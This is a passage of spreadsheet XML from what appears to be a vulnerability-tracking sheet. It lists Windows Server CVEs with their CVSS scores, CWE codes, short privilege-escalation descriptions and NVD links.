      <c r="S114" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69270</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69293</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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15" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S115" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69293</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69295</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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6" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="S116" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69295</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69298</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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17" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S117" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69298</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69307</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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8" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69307</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69312</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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9" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69312</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69323</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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0" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69323</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69352</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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1" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69352</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69421</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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2" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="S122" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows Kernel Mode Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69421</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69475</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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3" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69475</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69476</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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4" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S124" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69476</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69489</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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5" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S125" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69489</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69532</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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6" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S126" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69532</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69571</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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7" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S127" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69571</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69580</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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8" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S128" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69580</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69583</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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9" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S129" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69583</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69584</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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0" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S130" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69584</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69589</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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1" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S131" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69589</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69593</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
